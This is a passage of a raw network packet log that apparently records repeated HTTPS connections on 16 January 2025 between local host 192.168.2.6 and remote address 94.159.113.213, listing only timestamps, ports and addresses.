                        Jan 16, 2025 06:02:09.384210110 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384228945 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384237051 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384262085 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384282112 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384649038 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384690046 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384716034 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384723902 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384744883 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384766102 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385035038 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385078907 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385102034 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385109901 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385138988 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385148048 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385504961 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385550976 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385569096 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385584116 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385637045 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436028957 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436079025 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436094046 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436108112 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436124086 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436259985 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436707020 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:33.416505098 CET64290443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:33.416517019 CET4436429094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:33.864372015 CET4436429094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:33.864533901 CET64290443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:33.864592075 CET4436429094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:33.865178108 CET4436429094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:33.865250111 CET64290443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:33.867729902 CET64290443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:33.867753029 CET4436429094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:34.012248039 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.012274981 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:34.012411118 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.012662888 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.012676954 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:34.852833033 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:34.852916002 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.861893892 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.861902952 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:34.862142086 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:34.862149000 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:35.303632975 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:35.303693056 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.303697109 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:35.303750992 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.306225061 CET64299443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.306246996 CET4436429994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:35.448983908 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.449006081 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:35.449083090 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.449276924 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:35.449301004 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.150590897 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.150768995 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.151484013 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.151513100 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.151781082 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.151797056 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.600397110 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.600457907 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.600691080 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.604774952 CET64311443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.604818106 CET4436431194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.749147892 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.749243975 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:36.749373913 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.749604940 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:36.749639988 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.459121943 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.459269047 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.459801912 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.459817886 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.459969997 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.459980965 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.934066057 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.934145927 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.934189081 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.934231043 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:37.934248924 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.934284925 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.938043118 CET64321443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:37.938070059 CET4436432194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:38.078794956 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.078839064 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:38.078927994 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.079354048 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.079371929 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:38.796946049 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:38.797029018 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.797454119 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.797461033 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:38.797624111 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:38.797630072 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.256921053 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.257038116 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.257050037 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.257102013 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.258217096 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.258275986 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.258344889 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.258395910 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.260576010 CET64331443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.260591984 CET4436433194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.410590887 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.410624981 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:39.410729885 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.410959959 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:39.410974979 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.114788055 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.114857912 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.115331888 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.115338087 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.115647078 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.115653038 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.587171078 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.587397099 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.587630033 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.592904091 CET64340443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.592921019 CET4436434094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.752022982 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.752089977 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:40.752170086 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.758975983 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:40.759004116 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.487422943 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.487498045 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.494131088 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.494141102 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.494369030 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.494379997 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.946260929 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.946347952 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:41.946357012 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.946528912 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.950911999 CET64350443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:41.950934887 CET4436435094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:42.097259045 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.097289085 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:42.097393036 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.097651958 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.097666979 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:42.941364050 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:42.941451073 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.941821098 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.941842079 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:42.943558931 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:42.943571091 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:43.414531946 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:43.414704084 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:43.414731979 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.414869070 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.418181896 CET64360443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.418219090 CET4436436094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:43.578509092 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.578596115 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:43.578691006 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.578918934 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:43.578955889 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.443224907 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.443309069 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:44.443734884 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:44.443762064 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.443948984 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:44.443962097 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.919193983 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.919394016 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:44.919496059 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:44.922238111 CET64371443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:44.922278881 CET4436437194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:45.061074018 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.061098099 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:45.061197042 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.061809063 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.061824083 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:45.761717081 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:45.761801958 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.762193918 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.762201071 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:45.762402058 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:45.762409925 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.224693060 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.224776983 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.224787951 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.224854946 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.224889040 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.224941015 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.227581978 CET64382443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.227591991 CET4436438294.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.371763945 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.371803999 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:46.371915102 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.372132063 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:46.372143984 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.099922895 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.100002050 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.100358963 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.100366116 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.100554943 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.100560904 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.575280905 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.575368881 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.575401068 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.575459957 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.575499058 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.575550079 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.577874899 CET64390443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.577888966 CET4436439094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.723754883 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.723787069 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:47.723865986 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.724071980 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:47.724087000 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.434664965 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.434746027 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.435273886 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.435278893 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.435532093 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.435535908 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.881516933 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.881589890 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.881611109 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.881649971 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.881696939 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:48.881742954 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.884146929 CET64401443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:48.884162903 CET4436440194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:49.036154985 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.036190987 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:49.036284924 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.036514997 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.036530018 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:49.765682936 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:49.765764952 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.766243935 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.766248941 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:49.766417980 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:49.766421080 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:50.212774038 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:50.212937117 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:50.212958097 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.212992907 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.215558052 CET64410443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.215574980 CET4436441094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:50.354043007 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.354090929 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:50.354197025 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.354509115 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:50.354547977 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.078711987 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.078892946 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.081240892 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.081269979 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.082331896 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.082345009 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.557635069 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.557687998 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.557882071 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.557883024 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.562980890 CET64416443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.563019991 CET4436441694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.708404064 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.708446980 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:51.708655119 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.708827019 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:51.708841085 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.409714937 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.409842968 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.410471916 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.410480976 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.412820101 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.412825108 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.881906033 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.882064104 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:52.882070065 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.882144928 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.894870043 CET64417443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:52.894886971 CET4436441794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:53.090536118 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.090605021 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:53.090719938 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.091624975 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.091660976 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:53.824573040 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:53.824814081 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.825160027 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.825181961 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:53.825341940 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:53.825354099 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:54.372271061 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:54.372375011 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.372384071 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:54.372452974 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.374736071 CET64418443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.374771118 CET4436441894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:54.510317087 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.510358095 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:54.510447979 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.510751009 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:54.510763884 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.225358009 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.225466967 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.225996017 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.226002932 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.226241112 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.226246119 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.706921101 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.707005978 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.707072020 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.707223892 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.710972071 CET64419443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.710992098 CET4436441994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.867034912 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.867136002 CET4436442094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:55.867294073 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.867511988 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:55.867532969 CET4436442094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:56.593383074 CET4436442094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:56.593570948 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:56.593894958 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:56.593924046 CET4436442094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:56.594188929 CET64420443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:56.594202042 CET4436442094.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.843585014 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.843628883 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.843647003 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.843653917 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.843682051 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.843704939 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.892333984 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.892374992 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.892405987 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.892414093 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.892446995 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.892458916 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.892918110 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.892961979 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.892977953 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.892986059 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.893014908 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.893028021 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.893497944 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.893539906 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.893567085 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.893573999 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.893603086 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.893615007 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.929362059 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.929402113 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.929430962 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.929439068 CET4436442694.159.113.213192.168.2.6
                        Jan 16, 2025 06:03:04.929466963 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.929485083 CET64426443192.168.2.694.159.113.213
                        Jan 16, 2025 06:03:04.929543018 CET4436442694.159.113.213192.168.2.6
